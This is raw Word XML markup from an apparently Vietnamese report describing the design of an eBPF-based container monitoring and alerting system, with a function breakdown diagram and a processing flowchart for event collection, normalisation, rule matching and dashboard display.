                <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="32" type="#_x0000_t32" style="position:absolute;left:1984150;top:1098775;height:0;width:221100;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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8pZwq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v:imagedata o:title=""/>
                  <o:lock v:ext="edit" aspectratio="f"/>
                </v:shape>
                <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="32" type="#_x0000_t32" style="position:absolute;left:1972750;top:1721400;flip:x;height:900;width:243900;rotation:11796480f;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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JfPb9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1972750;top:2178600;flip:x;height:900;width:243900;rotation:11796480f;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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q/fm+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1972750;top:2712000;flip:x;height:900;width:243900;rotation:11796480f;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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Lpt4Bi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1972750;top:3321600;flip:x;height:900;width:243900;rotation:11796480f;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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1SFFg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1972750;top:3938111;flip:x;height:900;width:243900;rotation:11796480f;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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pL7R8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3959725;top:1098775;flip:x;height:1085100;width:4800;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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AuP2a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v:imagedata o:title=""/>
                  <o:lock v:ext="edit" aspectratio="f"/>
                </v:shape>
                <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="32" type="#_x0000_t32" style="position:absolute;left:3965350;top:1098775;height:0;width:221100;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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&#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2iJvo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v:imagedata o:title=""/>
                  <o:lock v:ext="edit" aspectratio="f"/>
                </v:shape>
                <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="32" type="#_x0000_t32" style="position:absolute;left:3953950;top:1721400;flip:x;height:900;width:243900;rotation:11796480f;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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F3us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3953950;top:2178600;flip:x;height:900;width:243900;rotation:11796480f;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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QI9wx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5841925;top:1098775;flip:x;height:3448500;width:27600;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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m0lde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v:imagedata o:title=""/>
                  <o:lock v:ext="edit" aspectratio="f"/>
                </v:shape>
                <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="32" type="#_x0000_t32" style="position:absolute;left:5870350;top:1098775;height:0;width:221100;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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UZaaO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v:imagedata o:title=""/>
                  <o:lock v:ext="edit" aspectratio="f"/>
                </v:shape>
                <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="32" type="#_x0000_t32" style="position:absolute;left:5858950;top:1721400;flip:x;height:900;width:243900;rotation:11796480f;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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z2bos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5858950;top:2178600;flip:x;height:900;width:243900;rotation:11796480f;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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7R2xb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5858950;top:2712000;flip:x;height:900;width:243900;rotation:11796480f;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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D4016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5858950;top:3321600;flip:x;height:900;width:243900;rotation:11796480f;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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&#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IWdHL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5858950;top:3938111;flip:x;height:900;width:243900;rotation:11796480f;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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Tivit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5858950;top:4540800;flip:x;height:900;width:243900;rotation:11796480f;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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&#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EX2Bl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w10:wrap type="none"/>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>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1</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkStart w:id="47" w:name="_Toc260392647"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>: Cây phân rã chức năng</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Từ sơ đồ trên có thể thấy hệ thống được phân thành 4 chức năng chính gồm: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Thu thập dữ liệu: Thu thập các sự kiện sinh ra từ kernel thông qua eBPF, giám sát các lời gọi hệ thống quan trọng như execve, openat và connect, lọc các sự kiện theo container và filter đơn giản trước khi chuyển sang bước xử lý dữ liệu</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Quản lý dữ liệu: chuẩn hóa dữ liệu thu thập được về định dạng thống nhất, lưu lại dữ liệu để đảm bảo việc truy vết sau này, đưa dữ liệu vào cache đồng thời sinh process tree tương ứng với tiến trình. Đối chiếu với các filter để đảm bảo việc hiển thị.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Quản lý cảnh báo: đối chiếu dữ liệu với tập luật để xác định hành vi bất thường và sinh cảnh báo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Quản lý hiển thị: hiển thị sự kiện theo thời gian thực, hiển thị danh sách cảnh báo, cung cấp cây tiến trình và thông tin chi tiết hỗ trợ điều tra</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_heading=h.yj33qood3zdc" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="48"/>
      <w:bookmarkStart w:id="49" w:name="_Toc1905538063"/>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Lưu đồ xử lý tổng thể</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
                <wp:extent cx="5767070" cy="4839970"/>
                <wp:effectExtent l="0" t="4445" r="5080" b="13335"/>
                <wp:docPr id="61" name="Group 61"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="148100" y="112850"/>
                          <a:ext cx="5767043" cy="4839970"/>
                          <a:chOff x="396557" y="47231"/>
                          <a:chExt cx="7186261" cy="5515182"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="80" name="Shape 80"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1052515" y="47231"/>
                            <a:ext cx="1483620" cy="655775"/>
                          </a:xfrm>
                          <a:prstGeom prst="ellipse">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Bắt đầu</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="81" name="Shape 81"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="590417" y="1080229"/>
                            <a:ext cx="2398322" cy="615059"/>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Khởi tạo eBPF Agent</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="82" name="Shape 82"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="925838" y="3186025"/>
                            <a:ext cx="1727100" cy="568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sự kiện</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="83" name="Shape 83"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3222161" y="3212737"/>
                            <a:ext cx="1727330" cy="623913"/>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chuẩn hóa dữ liệu</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="84" name="Shape 84"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="686160" y="4150088"/>
                            <a:ext cx="2187054" cy="848433"/>
                          </a:xfrm>
                          <a:prstGeom prst="flowChartDecision">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both"/>
                                <w:rPr>
                                  <w:sz w:val="24"/>
                                  <w:szCs w:val="24"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                                  <w:b w:val="0"/>
                                  <w:i w:val="0"/>
                                  <w:smallCaps w:val="0"/>
                                  <w:strike w:val="0"/>
                                  <w:color w:val="000000"/>
                                  <w:sz w:val="24"/>
                                  <w:szCs w:val="24"/>
                                  <w:vertAlign w:val="baseline"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:hint="default" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                                  <w:b w:val="0"/>
                                  <w:i w:val="0"/>
                                  <w:smallCaps w:val="0"/>
                                  <w:strike w:val="0"/>
                                  <w:color w:val="000000"/>
                                  <w:sz w:val="24"/>
                                  <w:szCs w:val="24"/>
                                  <w:vertAlign w:val="baseline"/>
                                  <w:lang w:val="vi-VN"/>
                                </w:rPr>
                                <w:t xml:space="preserve">    </w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                                  <w:b w:val="0"/>
                                  <w:i w:val="0"/>
                                  <w:smallCaps w:val="0"/>
                                  <w:strike w:val="0"/>
                                  <w:color w:val="000000"/>
                                  <w:sz w:val="24"/>
                                  <w:szCs w:val="24"/>
                                  <w:vertAlign w:val="baseline"/>
                                </w:rPr>
                                <w:t>filter</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="85" name="Shape 85"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3114549" y="2159176"/>
                            <a:ext cx="1834942" cy="639513"/>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Dashboard hiển thị</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="62" name="Straight Arrow Connector 62"/>
                        <wps:cNvCnPr>
                          <a:stCxn id="80" idx="4"/>
                          <a:endCxn id="81" idx="0"/>
                        </wps:cNvCnPr>
                        <wps:spPr>
                          <a:xfrm flipH="1">
                            <a:off x="1789980" y="703006"/>
                            <a:ext cx="4748" cy="377163"/>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3" name="Straight Arrow Connector 63"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm flipH="1">
                            <a:off x="1778902" y="1702601"/>
                            <a:ext cx="12660" cy="440889"/>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4" name="Straight Arrow Connector 64"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1789388" y="2676625"/>
                            <a:ext cx="0" cy="509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5" name="Straight Arrow Connector 65"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm flipH="1">
                            <a:off x="1777988" y="3754525"/>
                            <a:ext cx="11400" cy="4221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6" name="Straight Arrow Connector 66"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm rot="10800000">
                            <a:off x="4086013" y="2798725"/>
                            <a:ext cx="0" cy="414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88" name="Shape 88"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="915626" y="2143615"/>
                            <a:ext cx="1727330" cy="639513"/>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Chờ sự kiện từ kernel</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="93" name="Shape 93"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="396557" y="2774976"/>
                            <a:ext cx="1598354" cy="436470"/>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callback nhận event</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="94" name="Shape 94"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5882721" y="4253548"/>
                            <a:ext cx="1213500" cy="4221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chờ sự kiện tiếp theo</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="95" name="Shape 95"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3721449" y="5044026"/>
                            <a:ext cx="1030226" cy="407569"/>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Bỏ qua</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="96" name="Shape 96"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2855015" y="4114768"/>
                            <a:ext cx="1160785" cy="477968"/>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Hợp lệ</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="97" name="Shape 97"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5396118" y="3096961"/>
                            <a:ext cx="2186700" cy="800650"/>
                          </a:xfrm>
                          <a:prstGeom prst="flowChartDecision">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rule</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="98" name="Shape 98"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5625921" y="2230194"/>
                            <a:ext cx="1727100" cy="5685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Sinh Alert</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="67" name="Straight Arrow Connector 67"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm rot="10800000">
                            <a:off x="6489468" y="2798761"/>
                            <a:ext cx="0" cy="2982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8" name="Straight Arrow Connector 68"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm rot="10800000">
                            <a:off x="4949721" y="2514444"/>
                            <a:ext cx="6762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69" name="Straight Arrow Connector 69"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="6489468" y="3897611"/>
                            <a:ext cx="0" cy="355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2" name="Shape 102"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="6145246" y="3899250"/>
                            <a:ext cx="539700" cy="266100"/>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sai</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="103" name="Shape 103"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5637891" y="2756287"/>
                            <a:ext cx="889381" cy="537958"/>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Đúng</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="70" name="Straight Arrow Connector 70"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4949563" y="3497275"/>
                            <a:ext cx="4467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1" name="Straight Arrow Connector 71"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1769407" y="5016304"/>
                            <a:ext cx="16617" cy="546109"/>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2" name="Straight Arrow Connector 72"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm rot="10800000">
                            <a:off x="6489471" y="4675648"/>
                            <a:ext cx="17400" cy="846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3" name="Straight Arrow Connector 73"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm rot="10800000" flipH="1">
                            <a:off x="1766275" y="5501675"/>
                            <a:ext cx="4730400" cy="306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4" name="Straight Arrow Connector 74"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm rot="10800000">
                            <a:off x="4074353" y="3804046"/>
                            <a:ext cx="4748" cy="806196"/>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5" name="Straight Arrow Connector 75"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2848685" y="4583566"/>
                            <a:ext cx="1238328" cy="17784"/>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381.1pt;width:454.1pt;" coordorigin="396557,47231" coordsize="7186261,5515182" o:gfxdata="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">
                <o:lock v:ext="edit" aspectratio="f"/>
                <v:shape id="Shape 80" o:spid="_x0000_s1026" o:spt="3" type="#_x0000_t3" style="position:absolute;left:1052515;top:47231;height:655775;width:1483620;v-text-anchor:middle;" fillcolor="#CFE2F3" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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WbjFIuwAAANs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Bắt đầu</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:rect id="Shape 81" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:590417;top:1080229;height:615059;width:2398322;v-text-anchor:middle;" fillcolor="#CFE2F3" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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p0ddc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Khởi tạo eBPF Agent</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Shape 82" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:925838;top:3186025;height:568500;width:1727100;v-text-anchor:middle;" fillcolor="#CFE2F3" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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ZA0kr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sự kiện</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Shape 83" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:3222161;top:3212737;height:623913;width:1727330;v-text-anchor:middle;" fillcolor="#CFE2F3" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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9k/ss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chuẩn hóa dữ liệu</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 84" o:spid="_x0000_s1026" o:spt="110" type="#_x0000_t110" style="position:absolute;left:686160;top:4150088;height:848433;width:2187054;v-text-anchor:middle;" fillcolor="#CFE2F3" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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wlRGR7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both"/>
                          <w:rPr>
                            <w:sz w:val="24"/>
                            <w:szCs w:val="24"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                            <w:b w:val="0"/>
                            <w:i w:val="0"/>
                            <w:smallCaps w:val="0"/>
                            <w:strike w:val="0"/>
                            <w:color w:val="000000"/>
                            <w:sz w:val="24"/>
                            <w:szCs w:val="24"/>
                            <w:vertAlign w:val="baseline"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:hint="default" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                            <w:b w:val="0"/>
                            <w:i w:val="0"/>
                            <w:smallCaps w:val="0"/>
                            <w:strike w:val="0"/>
                            <w:color w:val="000000"/>
                            <w:sz w:val="24"/>
                            <w:szCs w:val="24"/>
                            <w:vertAlign w:val="baseline"/>
                            <w:lang w:val="vi-VN"/>
                          </w:rPr>
                          <w:t xml:space="preserve">    </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                            <w:b w:val="0"/>
                            <w:i w:val="0"/>
                            <w:smallCaps w:val="0"/>
                            <w:strike w:val="0"/>
                            <w:color w:val="000000"/>
                            <w:sz w:val="24"/>
                            <w:szCs w:val="24"/>
                            <w:vertAlign w:val="baseline"/>
                          </w:rPr>
                          <w:t>filter</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:rect id="Shape 85" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:3114549;top:2159176;height:639513;width:1834942;v-text-anchor:middle;" fillcolor="#CFE2F3" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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W6tFf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Dashboard hiển thị</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="32" type="#_x0000_t32" style="position:absolute;left:1789980;top:703006;flip:x;height:377163;width:4748;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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xl9MW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1778902;top:1702601;flip:x;height:440889;width:12660;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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IylRXr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color="#000000" joinstyle="round" endarrow="block"/>
                  <v:imagedata o:title=""/>
                  <o:lock v:ext="edit" aspectratio="f"/>
                </v:shape>
                <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="32" type="#_x0000_t32" style="position:absolute;left:1789388;top:2676625;height:509400;width:0;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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OLGchL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color="#000000" joinstyle="round" endarrow="block"/>
                  <v:imagedata o:title=""/>
                  <o:lock v:ext="edit" aspectratio="f"/>
                </v:shape>
                <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="32" type="#_x0000_t32" style="position:absolute;left:1777988;top:3754525;flip:x;height:422100;width:11400;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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DjGyx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4086013;top:2798725;height:414300;width:0;rotation:11796480f;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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&#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">
                  <v:fill on="f" focussize="0,0"/>
                  <v:stroke color="#000000" joinstyle="round" endarrow="block"/>
                  <v:imagedata o:title=""/>
                  <o:lock v:ext="edit" aspectratio="f"/>
                </v:shape>
                <v:rect id="Shape 88" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:915626;top:2143615;height:639513;width:1727330;v-text-anchor:middle;" fillcolor="#CFE2F3" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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PjrfsG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Chờ sự kiện từ kernel</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 93" o:spid="_x0000_s1026" o:spt="202" type="#_x0000_t202" style="position:absolute;left:396557;top:2774976;height:436470;width:1598354;" filled="f" stroked="f" coordsize="21600,21600" o:gfxdata="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ODP8TbAAAAA2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callback nhận event</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:rect id="Shape 94" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:5882721;top:4253548;height:422100;width:1213500;v-text-anchor:middle;" fillcolor="#CFE2F3" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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H/iGb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chờ sự kiện tiếp theo</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 95" o:spid="_x0000_s1026" o:spt="202" type="#_x0000_t202" style="position:absolute;left:3721449;top:5044026;height:407569;width:1030226;" filled="f" stroked="f" coordsize="21600,21600" o:gfxdata="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ABqzNnAAAAA2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Bỏ qua</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:shape id="Shape 96" o:spid="_x0000_s1026" o:spt="202" type="#_x0000_t202" style="position:absolute;left:2855015;top:4114768;height:477968;width:1160785;" filled="f" stroked="f" coordsize="21600,21600" o:gfxdata="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PC4Uq7AAAAA2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Hợp lệ</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:shape id="Shape 97" o:spid="_x0000_s1026" o:spt="110" type="#_x0000_t110" style="position:absolute;left:5396118;top:3096961;height:800650;width:2186700;v-text-anchor:middle;" fillcolor="#CFE2F3" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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t19O7b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rule</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
